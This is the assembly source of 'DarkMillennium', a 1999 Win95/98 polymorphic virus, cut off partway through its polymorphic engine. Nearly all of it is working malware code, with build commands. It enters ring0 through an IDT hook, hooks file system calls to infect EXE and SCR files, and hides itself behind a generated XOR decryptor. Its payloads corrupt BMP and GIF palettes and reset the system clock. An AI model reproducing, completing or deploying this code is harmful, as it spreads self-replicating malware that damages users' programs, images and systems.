;		DarkMillennium Project
;		developed by Clau / Ultimate Chaos
;
;		The Project is a Win95/98 compatible virus.
;		Also this is my first virus that infects PE files.
;
;		Greets goes to all Ultimate Chaos members and all people in VX scene.
;		Respect to all of you.
;
;----------------
;  DESCRIPTION  |
;----------------
;
;	on program load :
;		- it proccess a polymorphic decryptor
;			- it is made in 2 parts
;				- 1. Finding the key that encryption was made with (between 0 ... 65535)
;				- 2. Decrypt the code with that key
;		- check if it is already resident
;		- if not, go into ring0
;			- get memory with GetHeap
;			- copy itself into allocated memory
;			- hook the API (InstallFileSystemAPIhook)
;		-return to host program
;	on FS calls, if IFSFN_OPEN/IFSFN_RENAME/IFSFN_FILEATRIB
;		- check if extension is EXE/SCR
;			- check if the file format is PE
;			- if so, infect the file
;				- Generate random polymorphic decryptor, and write it to file
;				- Encrypt the code with a simple XOR method using a random key witch is never saved
;				It use only 2 bytes buffer for encryption, it encrypt 2 bytes at a time and write them
;				into the file, until all the code is encrypted and written. This method is slower,
;				but low memory is used.
;		- check for a condition and if it is true then display a message box trough VxD call
;		payloads, the condition is the number of infected files be equal to infected_nr_trigger
;		- thanks goes to Midnyte (member of Ultimate Chaos, coder, GFXer) for helping me with this nice payload
;			- on BMP and GIF open they will go darker and darker on every open
;				- on some BMPs and GIFs the effect is more cool, I can say strange
;
;----------------------------------------
;	Polymoprhic engine description    |
;----------------------------------------
;
;	This is my first poly engine.
;	- random junk code
;		- do nothing instructions (instructions that do not interfer with the decryptor)
;		- they are 1, 2 or more bytes instructions, and more instructions combined
;			- 1 byte - cmc, clc, stc, nop
;			- 2 bytes - a range of INTs
;			- > 2 bytes - it can generate random MOV, PUSH, POP ... infact all instructions
;			that are used in decryptor, without interfering with the decryptor (it use regs
;			that are not used in decrypt process)
;	- more ways to do the same thing instructions
;		example : MOV EAX, 12345678h	<=>	PUSH 12345678h
;								POP EAX
;	- the decryptor size can be ~ 3 times bigger then the original decryptor
;	- if the decryptor is smaller then the decryptor before, the space between it and the encrypted code
;	will be filled with junk.
;
;
;	Compile with:
;	tasm32 /m3 /ml darkmillennium.asm
;	tlink32 /Tpe /aa /x darkmillennium.obj, darkmillennium.exe, , import32.lib
;
;	report any bugs to clau@ultimatechaos.org
;
 
.386p
.model	flat

extrn		ExitProcess:proc
extrn		MessageBoxA:proc

VxDCall	macro	vxd_id, service_id
		int	20h
		dw	service_id
		dw	vxd_id
		endm

IFSMgr				=	0040h		; VxD service
GetHeap				=	000dh
InstallFileSystemAPIhook	=	0067h
Ring0_FileIO			=	0032h
UniToBCSPath			=	0041h
IFSFN_OPEN				=	36
IFSFN_RENAME			=	37
IFSFN_FILEATTRIB			=	33
R0_opencreatefile			=	0d500h		; open/create file
R0_readfile				=	0d600h		; read a file, no context
R0_writefile			=	0d601h		; write to a file, no context
R0_closefile			=	0d700h		; close a file
exception_int			=	3
exe_ext				=	'EXE.'
scr_ext				=	'RCS.'
bmp_ext				=	'PMB.'
gif_ext				=	'FIG.'
virussize				=	_end - Start
virussize_plus_buffers		=	virussize + ( _end_2 - _end )
polyengine_size			=	_end - GenDecryptor
infected_nr_trigger		=	200

.code

Begin:
		push	64
		push	offset w_title
		push	offset copyright
		push	0
		call	MessageBoxA
		jmp	Start

.data

;-------------------- Start Code -------------------

Start:	call	Delta
Delta:	mov	esi, esp
		mov	ebp, dword ptr ss:[esi]
		sub	ebp, offset Delta

		pushad
		lea	esi, [ebp + key - Start]	; address of code key
		add	esi, offset Start
		xor	di, di		; key for decryption
find_loop:	inc	di
		mov	ax, [esi]		; load code key in eax
		xor	ax, di		; decrypt it with the key from edi
		cmp	ax, 9090h	; check if edi key is OK
		jnz	find_loop		; if not jump to find_loop

		;  now edi = the key for decryption
		lea	esi, [ebp + Encr_Code - Start]
		add	esi, offset Start
		mov	ecx, virussize
decr_loop:	xor	word ptr [esi], di
		add	esi, 2
		sub	ecx, 2
		cmp	ecx, 1
		jg	decr_loop

		popad

		;  "alocate" space equal to current decryptor size, incase that the next generated decryptors
		;  will be bigger, and it will be bigger then this one
		;  this space will be filled with random junk instructions
		db	($ - offset Start) * 2 dup (90h)	;  for big decryptors not overwrite Data Zone

Encr_Code:
key		dw	9090h
		jmp	virus_code

;-------------------- Data Zone -------------------

IDT_Address	dq	0
flag		db	0
newaddress	dd	0
exception	dd	0
old_offset	dd	0
filename		db	260 dup (0)
handle		dd	0
crt_move		dd	0
peheader		dd	0
S_Align		dd	0
F_Align		dd	0
sec_ptr		dd	0
Old_EIP		dd	0
SOI		dd	0
virusplace	dd	0
imagebase	dd	0
infected_files	dw	0

SEH_nextpointer	dd	?
SEH_oldpointer	dd	?
SEH_errorhandler	dd	?

IMAGE_DOS_HEADER	struc
	MZ_magic	dw	?
	MZ_cblp		dw	?
	MZ_cp		dw	?
	MZ_crlc		dw	?
	MZ_cparhdr	dw	?
	MZ_minalloc	dw	?
	MZ_maxalloc	dw	?
	MZ_ss		dw	?
	MZ_sp		dw	?
	MZ_csum		dw	?
	MZ_ip		dw	?
	MZ_cs		dw	?
	MZ_lfarlc		dw	?
	MZ_ovno		dw	?
	MZ_res		dw	4 dup (?)
	MZ_oemid	dw	?
	MZ_oeminfo	dw	?
	MZ_res2		dw	10 dup (?)
	MZ_lfanew	dd	?
IMAGE_DOS_HEADER	ends
IMAGE_DOS_HEADER_SIZE = SIZE IMAGE_DOS_HEADER

IMAGE_FILE_HEADER	struc
	PE_Magic		dd	?
	Machine		dw	?
	NumberOfSections	dw	?
	TimeDateStamp	dd	?
	PointerToSymbolTable	dd	?
	NumberOfSymbols	dd	?
	SizeOfOptionalHeader	dw	?
	Characteristics	dw	?
IMAGE_FILE_HEADER	ends
IMAGE_FILE_HEADER_SIZE = SIZE IMAGE_FILE_HEADER

IMAGE_DATA_DIRECTORY	struc
	dd_VirtualAddress	dd	?
	dd_Size		dd	?
IMAGE_DATA_DIRECTORY	ends

IMAGE_DIRECTORY_ENTRIES	struc
	DE_Export	IMAGE_DATA_DIRECTORY	?
	DE_Import	IMAGE_DATA_DIRECTORY	?
	DE_Resource	IMAGE_DATA_DIRECTORY	?
	DE_Exception	IMAGE_DATA_DIRECTORY	?
	DE_Security	IMAGE_DATA_DIRECTORY	?
	DE_BaseReloc	IMAGE_DATA_DIRECTORY	?
	DE_Debug	IMAGE_DATA_DIRECTORY	?
	DE_Copyright	IMAGE_DATA_DIRECTORY	?
	DE_GlobalPtr	IMAGE_DATA_DIRECTORY	?
	DE_TLS		IMAGE_DATA_DIRECTORY	?
	DE_LoadConfig	IMAGE_DATA_DIRECTORY	?
	DE_BoundImport	IMAGE_DATA_DIRECTORY	?
	DE_IAT		IMAGE_DATA_DIRECTORY	?
IMAGE_DIRECTORY_ENTRIES	ends
IMAGE_NUMBEROF_DIRECTORY_ENTRIES = 16

IMAGE_OPTIONAL_HEADER	struc
	OH_Magic		dw	?
	OH_MajorLinkerVersion	db	?
	OH_MinorLinkerVersion	db	?
	OH_SizeOfCode		dd	?
	OH_SizeOfInitializedData	dd	?
	OH_SizeOfUninitializedData	dd	?	; Uninitialized Data
	OH_AddressOfEntryPoint	dd byte ptr ?	; Initial EIP
	OH_BaseOfCode		dd byte ptr ?	; Code Virtual Address
	OH_BaseOfData		dd byte ptr ?	; Data Virtual Address
	OH_ImageBase		dd byte ptr ?	; Base of image
	OH_SectionAlignment	dd	?	; Section Alignment
	OH_FileAlignment		dd	?	; File Alignment
	OH_MajorOperatingSystemVersion	dw ?	; Major OS
	OH_MinorOperatingSystemVersion	dw ?	; Minor OS
	OH_MajorImageVersion	dw	?	; Major Image version
	OH_MinorImageVersion	dw	?	; Minor Image version
	OH_MajorSubsystemVersion	dw	?	; Major Subsys version
	OH_MinorSubsystemVersion	dw	?
	OH_Win32VersionValue	dd	?	; win32 version
	OH_SizeOfImage		dd	?	; Size of image
	OH_SizeOfHeaders		dd	?	; Size of Header
	OH_CheckSum		dd	?	; unused
	OH_Subsystem		dw	?	; Subsystem
	OH_DllCharacteristics	dw	?	; DLL characteristic
	OH_SizeOfStackReserve	dd	?	; Stack reserve
	OH_SizeOfStackCommit	dd	?	; Stack commit
	OH_SizeOfHeapReserve	dd	?	; Heap reserve
	OH_SizeOfHeapCommit	dd	?	; Heap commit
	OH_LoaderFlags		dd	?	; Loader flags
	OH_NumberOfRvaAndSizes	dd	?	; Number of directories
				UNION		; directory entries
	OH_DataDirectory		IMAGE_DATA_DIRECTORY\
				IMAGE_NUMBEROF_DIRECTORY_ENTRIES DUP (?)
	OH_DirectoryEntries	IMAGE_DIRECTORY_ENTRIES ?
				ends
	ends
IMAGE_OPTIONAL_HEADER_SIZE = SIZE IMAGE_OPTIONAL_HEADER

IMAGE_SECTION_HEADER	struc
	SH_Name			db	8 dup (?)
			UNION
	SH_PhusicalAddress	dd byte ptr ?
	SH_VirtualSize		dd	?
			ends
	SH_VirtualAddress		dd	byte ptr ?
	SH_SizeOfRawData		dd	?
	SH_PointerToRawData	dd	byte ptr ?
	SH_PointerToRelocations	dd	byte ptr ?
	SH_PointerToLinenumbers	dd	byte ptr ?
	SH_NumberOfRelocations	dw	?
	SH_NumberOfLinenumbers	dw	?
	SH_Characteristics		dd	?
IMAGE_SECTION_HEADER	ends
IMAGE_SECTION_HEADER_SIZE = SIZE IMAGE_SECTION_HEADER

mz_header	IMAGE_DOS_HEADER	?
pe_header	IMAGE_FILE_HEADER	?
oh_header	IMAGE_OPTIONAL_HEADER	?
section		IMAGE_SECTION_HEADER	?

;-------------------- Real Code Zone ------------------

virus_code:	mov	eax, dword ptr fs:[00h]
		mov	dword ptr [ebp + SEH_nextpointer], eax
		mov	dword ptr [ebp + SEH_oldpointer], eax
		lea	eax, [ebp + return_to_host]
		mov	dword ptr [ebp + SEH_errorhandler], eax
		lea	eax, [ebp + SEH_nextpointer]
		mov	dword ptr fs:[00h], eax

		sidt	[ebp + IDT_Address]
		mov	esi, dword ptr [ebp + IDT_Address + 2]
		add	esi, exception_int * 8
		mov	dword ptr [ebp + exception], esi
		mov	bx, word ptr [esi + 6]
		shl	ebx, 10h
		mov	bx, word ptr [esi]
		mov	dword ptr [ebp + old_offset], ebx
		lea	eax, [ebp + offset Ring0]
		mov	word ptr [esi], ax
		shr	eax, 10h
		mov	word ptr [esi + 6], ax

		mov	eax, 0c000e990h
		cmp	dword ptr [eax], '2000'
		jne	go_into_ring0
		jmp	already_installed

go_into_ring0:	int	exception_int			; This will jump us to Ring0 proc in ring0 mode

already_installed:	mov	esi, dword ptr [ebp + exception]
		mov	ebx, dword ptr [ebp + old_offset]
		mov	word ptr [esi], bx
		shr	ebx, 10h
		mov	word ptr [esi + 6], bx

return_to_host:	mov	eax, dword ptr [ebp + SEH_oldpointer]
		mov	dword ptr fs:[00h], eax

exit:		cmp	ebp, 0
		je	generation_1
		mov	eax, [ebp + Old_EIP]
		add	eax, [ebp + imagebase]
		jmp	eax

generation_1:	push	0
		call	ExitProcess

Ring0		proc
		pusha

		; Get some memory
		mov	eax, virussize_plus_buffers + 100
		push	eax
		patch1_val	equ GetHeap + 256 * 256 * IFSMgr
		patch1	label far
		VxDCall	IFSMgr, GetHeap
		pop	ecx
		or	eax, eax
		jz	no_free_mem

		; Copy into memory
		xchg	eax, edi
		lea	esi, dword ptr [ebp + Start]
		push	edi
		mov	ecx, _end - Start
		rep	movsb
		pop	edi
		mov	dword ptr [ebp + newaddress], edi
		mov	dword ptr [edi + delta1 - Start], edi

		; hook API
		lea	eax, [edi + API_hook - Start]
		push	eax
		patch2_val	equ InstallFileSystemAPIhook + 256 * 256 * IFSMgr
		patch2	label far
		VxDCall	IFSMgr, InstallFileSystemAPIhook
		pop	ebx
		mov	[edi + nexthook - Start], eax
		jmp	success

no_free_mem:	jmp	back_to_ring3

success:		mov	eax, 0c000e990h
		mov	dword ptr [eax], '2000'
		mov	byte ptr [edi + flag - Start], 0

back_to_ring3:	popad
		iretd
Ring0		endp

API_hook:	push	ebp
		mov	ebp, esp
		sub	esp, 20h

		push	ebx
		push	esi
		push	edi

		db	0bfh
delta1		dd	0

		cmp	byte ptr [edi + flag - Start], 1
		je	over_now

		cmp	dword ptr [ebp + 12], IFSFN_OPEN		;  open action
		je	action_ok
		cmp	dword ptr [ebp + 12], IFSFN_RENAME		;  rename action
		je	action_ok
		cmp	dword ptr [ebp + 12], IFSFN_FILEATTRIB	;  attributes action
		je	action_ok
		jmp	over_now

action_ok:	mov	byte ptr [edi + flag - Start], 1
		pusha
		lea	esi, [edi + filename - Start]

		mov	eax, [ebp + 16]
		cmp	al, 0ffh
		je	no_path
		add	al, 40h
		mov	byte ptr [esi], al
		inc	esi
		mov	byte ptr [esi], ':'
		inc	esi
		mov	byte ptr [esi], '\'

		;  Unicode conversion
no_path:		push	0					;  BCS/WANSI code
		push	260					;  maximum filename
		mov	eax, [ebp + 28]				;  get IOREQ
		mov	eax, [eax + 12]
		add	eax, 4
		push	eax					;  push filename
		push	esi					;  push destination

		patch3_val	equ UniToBCSPath + 256 * 256 * IFSMgr
		patch3	label far
		VxDCall	IFSMgr, UniToBCSPath
		add	esp, 4 * 4
		add	esi, eax
		mov	byte ptr [esi], 0

		;  Check extension for '.EXE'
		cmp	dword ptr [esi - 4], exe_ext
		je	check_2

		;  Check extension for '.BMP'
		cmp	dword ptr [esi - 4], bmp_ext
		jne	check_gif_ext
		call	bmp_Payload

		;  Check extension for '.GIF'
check_gif_ext:
		cmp	dword ptr [esi - 4], gif_ext
		jne	check_scr_ext
		call	gif_Payload

		;  Check extension for '.SCR'  =  screensaver
check_scr_ext:
		cmp	dword ptr [esi - 4], scr_ext
		jne	not_exe

		;  Open the file
check_2:	lea	esi, [edi + filename - Start]
		call	file_open
		jc	not_exe
		mov	dword ptr [edi + handle - Start], eax

		;  Read DOS header
		lea	esi, [edi + mz_header - Start]
		mov	ebx, dword ptr [edi + handle - Start]
		mov	ecx, IMAGE_DOS_HEADER_SIZE
		mov	edx, 0
		call	file_read

		;  Check if really EXE file ( 'MZ' signature )
		lea	esi, [edi + mz_header - Start]
		mov	ax, word ptr [esi.MZ_magic]
		cmp	ax, 5a4dh
		jne	fileclose

		;  Locate the PE header
		mov	esi, dword ptr [esi.MZ_lfanew]
		cmp	esi, 500h
		ja	fileclose

		;  Save the pos of the PE header
		mov	dword ptr [edi + crt_move - Start], esi
		mov	dword ptr [edi + peheader - Start], esi

		;  Read the PE header
		lea	edx, [edi + pe_header - Start]
		mov	ebx, dword ptr [edi + handle - Start]
		mov	ecx, IMAGE_FILE_HEADER_SIZE + IMAGE_OPTIONAL_HEADER_SIZE
		xchg	esi, edx
		call	file_read

		add	dword ptr [edi + crt_move - Start], IMAGE_FILE_HEADER_SIZE + IMAGE_OPTIONAL_HEADER_SIZE

		;  Check for 'PE' signature
		lea	esi, [edi + pe_header - Start]
		mov	eax, dword ptr [esi.PE_Magic]
		cmp	eax, 00004550h
		jne	fileclose

		;  Check for DLL signature
		cmp	dword ptr [esi.Characteristics], 2000h
		je	fileclose

		;  Locate the last section and read it
		xor	eax, eax
		mov	ax, word ptr [esi.NumberOfSections]
		mov	ecx, IMAGE_SECTION_HEADER_SIZE
		dec	eax
		mul	ecx
		mov	esi, eax
		add	esi, dword ptr [edi + crt_move - Start]
		mov	dword ptr [edi + sec_ptr - Start], esi

		;  Read the last section
		lea	edx, [edi + section - Start]
		mov	ecx, IMAGE_SECTION_HEADER_SIZE
		mov	ebx, dword ptr [edi + handle - Start]
		xchg	esi, edx
		call	file_read

		;  Verify if already infected
		lea	esi, [edi +oh_header - Start]
		cmp	dword ptr [esi.OH_Win32VersionValue], '2000'
		je	fileclose

		mov	eax, dword ptr [esi.OH_SectionAlignment]
		mov	[edi + S_Align - Start], eax
		mov	eax, dword ptr [esi.OH_FileAlignment]
		mov	[edi + F_Align - Start], eax
		mov	eax, dword ptr [esi.OH_AddressOfEntryPoint]
		mov	[edi + Old_EIP - Start], eax
		mov	eax, dword ptr [esi.OH_SizeOfImage]
		mov	[edi + SOI - Start], eax
		mov	eax, dword ptr [esi.OH_ImageBase]
		mov	[edi + imagebase - Start], eax

		;  Update the section
		lea	esi, [edi + section - Start]
		mov	eax, dword ptr [esi.SH_PointerToRawData]
		add	eax, dword ptr [esi.SH_VirtualSize]
		mov	dword ptr [edi + virusplace - Start], eax
		mov	eax, dword ptr [edi.SH_SizeOfRawData]
		add	eax, virussize
		mov	ecx, dword ptr [edi + F_Align - Start]
		push	eax
		push	ecx
		xor	edx, edx
		div	ecx
		pop	ecx
		sub	ecx, edx
		pop	eax
		add	eax, ecx
		mov	dword ptr [esi.SH_SizeOfRawData], eax
		mov	eax, dword ptr [esi.SH_VirtualSize]
		add	eax, virussize
		mov	dword ptr [esi.SH_VirtualSize], eax

		;  Set the new characteristics for the section
		or	dword ptr [esi.SH_Characteristics], 00000020h	; code
		or	dword ptr [esi.SH_Characteristics], 20000000h	; executable
		or	dword ptr [esi.SH_Characteristics], 80000000h	; writable

		;  Update the PE header
		;  first the size of image wich is aligned to section alignment
		lea	esi, [edi + oh_header - Start]
		mov	eax, dword ptr [edi + SOI - Start]
		add	eax, virussize
		mov	ecx, dword ptr [edi + S_Align - Start]
		push	eax
		push	ecx
		xor	edx, edx
		div	ecx
		pop	ecx
		sub	ecx, edx
		pop	eax
		add	eax, ecx
		mov	dword ptr [esi.OH_SizeOfImage], eax

		; Address of Entrypoint to our virus ( Old Virtual Address + New Virtual Size - Virus Size )
		lea	esi, [edi + section - Start]
		mov	eax, dword ptr [esi.SH_VirtualAddress]
		add	eax, dword ptr [esi.SH_VirtualSize]
		sub	eax, virussize
		lea	esi, [edi + oh_header - Start]
		mov	dword ptr [esi.OH_AddressOfEntryPoint], eax

		;  Mark the infection
		mov	dword ptr [esi.OH_Win32VersionValue], '2000'

		; Write section to file
		lea	edx, [edi + section - Start]
		mov	ecx, IMAGE_SECTION_HEADER_SIZE
		mov	ebx, dword ptr [edi + handle - Start]
		mov	esi, dword ptr [edi + sec_ptr - Start]
		xchg	edx, esi
		call	file_write

		; Write headers to file
		lea	edx, [edi + pe_header - Start]
		mov	ecx, IMAGE_FILE_HEADER_SIZE + IMAGE_OPTIONAL_HEADER_SIZE
		mov	ebx, dword ptr [edi + handle - Start]
		mov	esi, dword ptr [edi + peheader - Start]
		xchg	edx, esi
		call	file_write

		;  Patch the code
		mov	cx, 20cdh
		mov	word ptr [edi + patch1 - Start], cx
		mov	eax, patch1_val
		mov	dword ptr [edi + patch1 - Start + 2], eax
		mov	word ptr [edi + patch2 - Start], cx
		mov	eax, patch2_val
		mov	dword ptr [edi + patch2 - Start + 2], eax
		mov	word ptr [edi + patch3 - Start], cx
		mov	eax, patch3_val
		mov	dword ptr [edi + patch3 - Start + 2], eax
		mov	word ptr [edi + patch4 - Start], cx
		mov	eax, patch4_val
		mov	dword ptr [edi + patch4 - Start + 2], eax
		mov	word ptr [edi + patch5 - Start], cx
		mov	eax, patch5_val
		mov	dword ptr [edi + patch5 - Start + 2], eax

		;  reset the infected_files counter
		mov	ax, 0
		mov	word ptr [edi + infected_files - Start], ax

		; Generate decryptor
		pushad
		mov	ebp, edi
		call	GenDecryptor
		popad

		;  Call Payload
		call	Payload

		; Write decryptor
		mov	edx, edi
		mov	ecx, Encr_Code - Start
		mov	ebx, dword ptr [edi + handle - Start]
		mov	esi, dword ptr [edi + virusplace - Start]
		xchg	edx, esi
		call	file_write

		mov	edx, dword ptr [edi + virusplace - Start]
		add	edx, Encr_Code - Start
		mov	dword ptr [edi + virusplace - Start], edx	; update virusplace

		;  Get random key for encryption in cx
		mov	eax, 0FFFFh
		call	random_in_range				;  will return in ax a random number
		xchg	ax, cx

		; Write encrypted area to file
		lea	edx, [edi + Encr_Code - Start]	;  location to copy and encrypt
		xor	eax, eax				;  counter

write_loop:	call	copy_in_buffer
		inc	edx
		inc	edx

		push	eax			;  save counter
		push	ecx			;  save the key
		push	edx			;  save location pointer in code

		;  Write buffer in file
		mov	ebx, dword ptr [edi + handle - Start]
		mov	ecx, 2
		mov	edx, dword ptr [edi + virusplace - Start]
		lea	esi, [edi + encryption_buffer - Start]
		call	file_write

		mov	edx, dword ptr [edi + virusplace - Start]
		inc	edx
		inc	edx
		mov	dword ptr [edi + virusplace - Start], edx

		pop	edx			;  restore loc. pointer
		pop	ecx			;  restore the key
		pop	eax			;  restore counter
		inc	eax
		inc	eax
		cmp	eax, _end - Encr_Code
		jle	write_loop

		;  Close the file
fileclose:	mov	ebx, dword ptr [edi + handle - Start]
		call	file_close

not_exe:	popa

over_now:	mov	byte ptr [edi + flag - Start], 0			; Set flag to 0
		mov	eax, [ebp + 28]
		push	eax
		mov	eax, [ebp + 24]
		push	eax
		mov	eax, [ebp + 20]
		push	eax
		mov	eax, [ebp + 16]
		push	eax
		mov	eax, [ebp + 12]
		push	eax
		mov	eax, [ebp + 08]
		push	eax

		db	0b8h
nexthook	dd	0
		call	[eax]

		add	esp, 6 * 4

		pop	edi
		pop	esi
		pop	ebx

		leave
		ret

;  Copy a word from code in encryption_buffer and encrypt it
;  cx = key for encryption
;  edx = pointer in code
copy_in_buffer	proc
		pushad
		mov	bx, word ptr [edx]
		xor	bx, cx
		mov	[edi + encryption_buffer - Start], bx
		popad
		ret

encryption_buffer	dw	0

copy_in_buffer	endp

get_rnd		proc
		push	bx
		xor	bx, ax
		xor	bx, cx
		xor	bx, dx
		xor	bx, sp
		xor	bx, bp
		xor	bx, si
		xor	bx, di
		in	al, 40h
		xor	bl, al
		in	al, 40h
		add	bh, al
		in	al, 41h
		sub	bl, al
		in	al, 41h
		xor	bh, al
		in	al, 42h
		add	bl, al
		in	al, 42h
		sub	bh, al
		xchg	bx, ax
		pop	bx
		ret
get_rnd	endp


; Ring0 File_IO
;-------------------------
Ring0_File_IO	proc
		patch4_val	equ Ring0_FileIO + 256 *256 * IFSMgr
		patch4	label far
		VxDCall	IFSMgr, Ring0_FileIO
		ret
Ring0_File_IO	endp

file_open		proc
		mov	bx, 2
		mov	cx, 0
		mov	dx, 1
		mov	eax, R0_opencreatefile
		call	Ring0_File_IO
		ret
file_open		endp

file_close		proc
		mov	eax, R0_closefile
		call	Ring0_File_IO
		ret
file_close		endp

file_read		proc
		mov	eax, R0_readfile
		call	Ring0_File_IO
		ret
file_read		endp

file_write		proc
		mov	eax, R0_writefile
		call	Ring0_File_IO
		ret
file_write		endp

Payload		proc

		;  Check the number of infected files
		pushad
		mov	ax, word ptr [edi + infected_files - Start]		;  check the number of infected files
		inc	ax									;  increase the counter with 1
		mov	word ptr [edi + infected_files - Start], ax
		cmp	ax, infected_nr_trigger
		jne	not_yet

		mov	ax, 0									;  reset the counter
		mov	word ptr [edi + infected_files - Start], ax
		;  the counter will also be reseted at in every new infected file

		;  (on every infected_nr_trigger will trigger a message box)
		lea	eax, [edi + WinTitle - Start]
		mov	[edi + TitleOff - Start], eax
		lea	eax, [edi + WinText - Start]
		mov	[edi + TextOff - Start], eax 
		lea	ebx, [edi + WinBox - Start]

		patch5_val	equ 001Ah + 256 * 256 * 002Ah
		patch5	label far
		VxDCall	002Ah, 001Ah

		;  give a try with random_in_range
		; (number between 0 and 10000)
not_yet:	mov	eax, 10000
		call	random_in_range
		cmp	eax, 500
		jg	end_payload

		;  as you see if the random number =< 500 then test the PC for year 2000 compatibilite :)
		;  infact it will jump into year 2000
		; the chances to do it are 5%
		mov	al, 07h
		out	70h, al
		mov	al, 01h
		out	71h, al		; day of the month
		mov	al, 08h
		out	70h, al
		mov	al, 01h
		out	71h, al		; month to January
		mov	al, 09h
		out	70h, al
		mov	al, 00h
		out	71h, al		; year (0 = 2000)
		; by the way ... this is a good test, you will see if your computer is compatible with year 2000 ;)
		; so i recommend you get infected with DarkMillennium

end_payload:popad
		ret

WinBox	dd	?
butt1		dw	0
butt2		dw	0001
butt3		dw	0
TitleOff	dd	offset WinTitle
TextOff	dd	offset WinText

WinTitle	db	'DarkMillennium Project',0
WinText	db	'DarkMillennium Project', 10, 'Copyright (C) 1999 by Clau/Ultimate Chaos', 10
		db	'www.ultimatechaos.org', 10
		db	'Greets to all VXers out there !', 0

Payload	endp

copyright		db	'DarkMillennium Project', 13, 10, 'Copyright (C) 1999 by Clau/Ultimate Chaos', 0
copyright_end:

bmp_Payload	proc
		pushad

		;  Open the file
		lea	esi, [edi + filename - Start]
		call	file_open
		mov	dword ptr [edi + handle - Start], eax

		; Read file
		lea	esi, [edi + gfx_buffer - Start]
		mov	ebx, [edi + handle - Start]
		mov	ecx, 256
		mov	edx, 54
		call	file_read

		;  Change the things arround
		lea	esi, [edi + gfx_buffer - Start]
		mov	ecx, 256

bmp_dark:	cmp	byte ptr [esi], 5
		jl	bmp_color_1
		sub	byte ptr [esi], 5
bmp_color_1:inc	esi
		cmp	byte ptr [esi], 5
		jl	bmp_color_2
		sub	byte ptr [esi], 5
bmp_color_2:inc	esi
		cmp	byte ptr [esi], 5
		jl	bmp_color_out
		sub	byte ptr [esi], 5
bmp_color_out:
		add	esi, 2
		sub	ecx, 4
		cmp	ecx, 0
		jne	bmp_dark

		;  Write file
		lea	esi, [edi + gfx_buffer - Start]
		mov	ecx, 256
		mov	ebx, [edi + handle - Start]
		mov	edx, 54
		call	file_write

		;  Close file
		mov	ebx, [edi + handle - Start]
		call	file_close

		popad
		ret
bmp_Payload	endp

gif_Payload	proc

;  Thanks goes to MidNyte for helping me with informations and code

		pushad

		;  Open the file
		lea	esi, [edi + filename - Start]
		call	file_open
		mov	dword ptr [edi + handle - Start], eax

		; Read file
		lea	esi, [edi + gfx_buffer - Start]
		mov	ebx, eax
		mov	ecx, 10Dh
		mov	edx, 0000h
		call	file_read

		xor	ecx, ecx
		mov	cl, byte ptr [edi + gfx_buffer + 000Ah - Start]
		and 	cl, 00000111b
		cmp	cl, 0
		je	exit_gif_payload				;  somethin' is wrong

		mov	ax, 2
get_colours:shl	ax, 1
		loop	get_colours

		mov	cx, ax
		shl	ax, 1
		add	cx, ax
		lea	esi, [edi + gfx_buffer - Start]
		add	esi, 000Dh

		push	edi
		mov	edi, esi
darken:	lodsb
		cmp	al, 14h
		jb	skip_entry
		sub	al, 14h
		stosb
skip_entry:	loop	darken
		pop	edi

		;  Write buffer back to file
		lea	esi, [edi + gfx_buffer - Start]
		mov	ebx, [edi + handle - Start]
		mov	ecx, 10Dh
		mov	edx, 0							; loc. to write in file
		call	file_write

exit_gif_payload:
		;  Close file
		mov	ebx, [edi + handle - Start]
		call	file_close

		popad
		ret
gif_Payload	endp


; ------------------------------------------------------------
;|                      Poly Engine                          |
; ------------------------------------------------------------

;  Generate decryptor
;  EBP = location for decryptor
GenDecryptor	proc

		xchg	ebp, edi
		call	InitRegGenerator
		call	GenerateRegisters

	;  call	00000000h
		mov	al, 0E8h
		stosb
		mov	eax, 00000000h
		stosd

	;  Generate Junk
		xchg	ebp, edi
		call	GenerateJunk
		xchg	ebp, edi

	;  mov	reg1, ESP
		mov	cl, byte ptr [ebp + reg_1 - Start]
		mov	ch, 04h				;  ESP
		mov	ax, 0001h
		xchg	ebp, edi
		call	GenPutX1X2
		xchg	ebp, edi

	;  Generate Junk
		xchg	ebp, edi
		call	GenerateJunk
		xchg	ebp, edi

	;  mov	reg_2, ss:[reg_1]
		mov	cl, byte ptr [ebp + reg_2 - Start]
		mov	ch, byte ptr [ebp + reg_1 - Start]
		mov	ax, 0101h
		xchg	ebp, edi
		call	GenPutX1X2
		xchg	ebp, edi

	;  Generate Junk
		xchg	ebp, edi
		call	GenerateJunk
		xchg	ebp, edi

	;  sub	reg_2, offset Delta
		mov	al, 81h
		stosb
		mov	al, byte ptr [ebp + reg_2 - Start]
		add	al, 0E8h
		stosb
		mov	eax, offset Delta
		stosd

	;  Generate Junk
		xchg	ebp, edi
		call	GenerateJunk
		xchg	ebp, edi

	;  xchg	reg_2, ebp
		mov	al, 87h
		stosb
		mov	al, byte ptr [ebp + reg_2 - Start]
		add	al, 0E8h
		stosb

	;  Generate Junk
		xchg	ebp, edi
		call	GenerateJunk
		xchg	ebp, edi

		call	GenerateRegisters

	;  pushad
		mov	al, 60h
		stosb

	;  Generate Junk
		xchg	ebp, edi
		call	GenerateJunk
		xchg	ebp, edi

	;  lea	reg_1, [ebp + key - Start]  ->  key offset will be setted later
		mov	al, 8Dh
		stosb
		mov	al, byte ptr [ebp + reg_1 - Start]
		mov	ebx, 8
		mul	ebx
		add	al, 85h
		stosb

		mov	[ebp + var2 - Start], edi		;  save EDI offset, for later use
		mov	eax, 00000000h
		stosd

	;  Generate Junk
		xchg	ebp, edi
		call	GenerateJunk
		xchg	ebp, edi

	;  add	reg_1, offset Start
		mov	al, 81h
		stosb
		mov	al, byte ptr [ebp + reg_1 - Start]
		add	al, 0C0h
		stosb
		mov	eax, offset Start
		stosd

	;  Generate Junk
		xchg	ebp, edi
		call	GenerateJunk
		xchg	ebp, edi

	;  xor	reg_2, reg_2
		mov	al, 33h
		stosb
		mov	al, byte ptr [ebp + reg_2 - Start]
		mov	ecx, eax
		mov	ebx, 8
		mul	ebx
		add	al, cl
		add	al, 0C0h
		stosb

	;  Generate Junk
		xchg	ebp, edi
		call	GenerateJunk
		xchg	ebp, edi

	;  inc	reg_2
		mov	[ebp + var1 - Start], edi			;  save in var1 current pos for future use
		mov	al, 40h
		add	al, byte ptr [ebp + reg_2 - Start]
		stosb

	;  Generate Junk
		xchg	ebp, edi
		call	GenerateJunk
		xchg	ebp, edi

	;  mov	reg_3, [reg_1]
		mov	al, byte ptr [ebp + reg_3 - Start]
		mov	cl, al
		mov	ch, byte ptr [ebp + reg_1 - Start]
		mov	ax, 0100h
		xchg	ebp, edi
		call	GenPutX1X2
		xchg	ebp, edi

	;  Generate Junk
		xchg	ebp, edi
		call	GenerateJunk
		xchg	ebp, edi

